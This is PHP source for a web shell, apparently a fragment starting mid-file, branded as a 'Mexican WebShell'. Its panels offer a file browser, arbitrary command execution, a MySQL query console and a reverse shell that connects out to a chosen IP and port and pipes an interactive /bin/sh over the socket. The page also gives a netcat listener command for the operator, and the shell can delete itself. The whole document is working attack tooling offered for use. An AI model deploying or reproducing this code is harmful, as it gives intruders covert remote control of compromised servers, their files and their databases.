buildPageLogin(); else{ switch($_POST['cmd']){ case 'browser': $browserTools=new BrowserTools(); switch($_POST['method']){ case 'show': $this->buildPageStructure($browserTools->main($_POST['item'],false)); break; case 'execute': $this->buildPageStructure($browserTools->main($_POST['item'])); break; default: $this->buildPageStructure($browserTools->main('.')); break; } break; case 'logout': $this->logout(); break; case 'remove': $this->remove(); break; case 'php': $phpTools=new PhpTools(); switch($_POST['method']){ case 'execute': $util=New Util(); $run=$util->execute($_POST['item']); foreach($run as $row){ $resp[]=htmlentities(wordwrap($row,100,' ',TRUE),ENT_QUOTES); } $this->buildPageStructure($phpTools->main($resp)); break; default: $this->buildPageStructure($phpTools->main('')); break; } break; case 'mysql': $mySql=new MySQLTools(); switch($_POST['method']){ case 'connect': if(!empty($_POST['userdb'])&&!empty($_POST['serverdb'])&&!empty($_POST['portdb'])){ $_SESSION['userdb']=$_POST['userdb']; $_SESSION['passdb']=$_POST['passdb']; $_SESSION['serverdb']=$_POST['serverdb']; $_SESSION['portdb']=$_POST['portdb']; if($mySql->connect()){ $_SESSION['connected']=TRUE; $this->buildPageStructure($mySql->main()); } else{ $error="
Warning! ".$_SESSION['linkdb']->connect_error."
"; $this->buildPageStructure($mySql->main($error)); } } break; case 'selectdb': if(!empty($_POST['item'])){ $_SESSION['db']=$_POST['item']; if($mySql->selectDb($_POST['item'])){ $this->buildPageStructure($mySql->main()); }else{ $error="
Warning! Can't select the Database. Please try again.
"; $this->buildPageStructure($mySql->main($error)); } } break; case 'query': if(!empty($_POST['item'])){ if($result=$mySql->execute($_POST['item'])){ $_SESSION['query']=$result; $this->buildPageStructure($mySql->main()); } else{ $error="
Warning! ".$_SESSION['linkdb']->error."
"; $this->buildPageStructure($mySql->main($error)); } } break; case 'logout': $_SESSION['connected']=NULL; $_SESSION['userdb']=NULL; $_SESSION['passdb']=NULL; $_SESSION['serverdb']=NULL; $_SESSION['portdb']=NULL; $_SESSION['db']=NULL; $_SESSION['linkdb']=NULL; $this->buildPageStructure($mySql->main()); break; default: $this->buildPageStructure($mySql->main()); break; } break; case 'reverse': $reverseTools=new ReverseTools(); switch($_POST['method']){ case 'connect': if( isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != ""){ $result=""; $ip = $_POST['ip']; $port=$_POST['port']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; /bin/sh -i'; $debug = 0; chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo "$errstr ($errno)"; exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { echo "ERROR: Can't spawn shell"; exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); $result .= "Successfully opened reverse shell to $ip:$port"; while (1) { if (feof($sock)) { $result.="ERROR: Shell connection terminated"; break; } if (feof($pipes[1])) { $result.="ERROR: Shell process terminated"; break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } $this->buildPageStructure($reverseTools->main()); break; default: $this->buildPageStructure($reverseTools->main('')); break; } break; case 'login': if(isset($_POST['pass'])&&!empty($_POST['pass'])){ $this->login($_POST['pass']); } break; default: $info=new Info(); $this->buildPageStructure($info->main()); break; } } } function buildPageLogin($error=NULL){ $this->buildHeader(); $this->buildLogin($error); $this->buildFooter(); } function buildPageStructure($body=NULL){ $this->buildHeader(); $this->buildMenu(); $this->buildBody($body); $this->buildFooter(); } function buildHeader(){ $structure= " WebShell
"; echo $structure; } function buildLogin($error){ $structure= "
"; $structure.=$error; echo $structure; } function buildMenu(){ $structure= "
WebShell
"; echo $structure; } function buildBody($body){ $structure=$body; echo $structure; } function buildFooter(){ $structure="
Mexican WebShell PHP. Powered by @codersoul
"; echo $structure; } function login($pass){ if($pass==$this->pass){ $_SESSION['logged']=TRUE; $info=new Info(); $this->buildPageStructure($info->main()); } else{ $error="
Warning! Password is not valid. Please try again.
"; $this->buildPageLogin($error); } } function logout(){ session_destroy(); header('Location: '.$_SERVER['PHP_SELF']); } function remove(){ session_destroy(); if(unlink($_SERVER['PHP_SELF'])){ echo "You can't remove this file."; exit; } header('Location: '.$_SERVER['PHP_SELF']); } } class PhpTools{ function main($run){ $util=New Util(); $body='

Php Execute

Response

';
        if(is_array($run)){
            foreach($run as $row)
                $body.=$row."
";
        }
        $body.='
'; return $body; } } class ReverseTools{ function main(){ $body='

Reverse shell

Listening with NetCat: nc -v -n -l 31337
'; return $body; } } class BrowserTools{ function getLinkDir($dir,$complete=true){ $path=""; if($complete){ $dirs = explode("/",$dir); for($i=0;$i'.$dirs[$i].'/'; } else{ if($i==0) $path.='/'; } } } else{ $path.=''.$dir.''; } return $path; } function getFixedFormat($result,$full_dir){ $util = new Util(); if(!empty($result)){ $structure=' '; for($i=1;$iimages('directory').'" /> '.htmlentities(wordwrap($result_array[8],50," ",TRUE),ENT_QUOTES).''; else $structure.=' '.htmlentities(wordwrap($result_array[8],50," ",TRUE),ENT_QUOTES).''; $structure.=''; $structure.=''; $structure.=''; $structure.=''; $structure.=''; $structure.=''; $structure.=''; } $structure.='
File name Permissions Owner Group Size Last modified
'.htmlentities(wordwrap($result_array[0],50," ",TRUE),ENT_QUOTES).''.htmlentities(wordwrap($result_array[2],50," ",TRUE),ENT_QUOTES).''.htmlentities(wordwrap($result_array[3],50," ",TRUE),ENT_QUOTES).''.htmlentities(wordwrap($result_array[4],50," ",TRUE),ENT_QUOTES).''.htmlentities(wordwrap($result_array[5],50," ",TRUE),ENT_QUOTES).' '.htmlentities(wordwrap($result_array[6],50," ",TRUE),ENT_QUOTES).' '.htmlentities(wordwrap($result_array[7],50," ",TRUE),ENT_QUOTES).'
'; return $structure; } } function main($item,$is_dir=true){ $util = new Util(); if($is_dir){ $_SESSION['dir']=$item; $modal = ""; } else{ $file = $item; $item = $_SESSION['dir']; $file_content = $util->execute("cat ".$file); $modal = ' '; } if($item=='.'){ $full_dir=getcwd(); } else{ $full_dir=$item; } $body=$modal.'

Browser Files

Shell path: '.$this->getLinkDir(getcwd(),false).'
Path: '.$this->getLinkDir($full_dir).'
'; $body.=$this->getFixedFormat($util->execute("ls -lhA ".$full_dir),$full_dir); $body.='
'; return $body; } } class MySqlLib{ function connect(){ $link=@new mysqli($_SESSION['serverdb'],$_SESSION['userdb'],$_SESSION['passdb'],$_SESSION['db'],$_SESSION['portdb']); $_SESSION['linkdb']=$link; if ($link->connect_errno) return false; return true; } function disconnect(){ $_SESSION['linkdb']->close(); } function selectDb(){ if($_SESSION['connected']==TRUE){ $this->connect(); if(!mysqli_select_db($_SESSION['linkdb'],$_SESSION['db'])){ return false; } $this->disconnect(); return true; } return false; } function execute($query){ if($_SESSION['connected']==TRUE){ $this->connect(); if(!$result=@mysqli_query($_SESSION['linkdb'],$query)) return false; $this->disconnect(); return $result; } return false; } function getData($query){ if($_SESSION['connected']==TRUE){ if(!$result = $this->execute($query)) return false; while($row = mysqli_fetch_object($result)){ $data[] = $row; } return $data; } return false; } } class MySqlTools extends MySqlLib{ function __construct(){ } function getConnection(){ if($_SESSION['connected']==TRUE){ $structure=" User: ".$_SESSION['userdb']."
Server: ".$_SESSION['serverdb']."
Port: ".$_SESSION['portdb']."
Logout "; return $structure; } else{ $structure='
'; return $structure; } } function getTables(){ if($_SESSION['connected']==TRUE){ return $this->getData("select table_name from information_schema.tables where table_schema='".$_SESSION['db']."'"); } return false; } function getDatabases(){ $structure=NULL; $tables=NULL; if($_SESSION['connected']==TRUE){ $result=$this->getData("select schema_name from information_schema.schemata"); foreach($result as $row){ $structure.="
  • schema_name){ $structure.="class='active'"; $tables=$this->getTables(); } $structure.=">".$row->schema_name."
    • "; if(!empty($tables)){ $structure.="
    • "; $tables=NULL; } } } return $structure; } function getQueryResult(){ if(!empty($_SESSION['query'])){ $structure=' '; while($row= $_SESSION['query']->fetch_field()) $structure.=''; $structure.=' '; while($result = mysqli_fetch_object($_SESSION['query'])){ $structure.=' '; foreach($result as $row){ $structure.=''; } $structure.=' '; } $structure.='
    '.htmlentities($row->name,ENT_QUOTES).'
    '.htmlentities($row,ENT_QUOTES).'
    '; $_SESSION['query']=NULL; return $structure; } } function main($error=NULL){ $body='
    • Connection
    • '.$this->getConnection().'
    • Databases
      • '.$this->getDatabases().'
    • Tools
    • Show Process
    '.$error.'

    Execute Query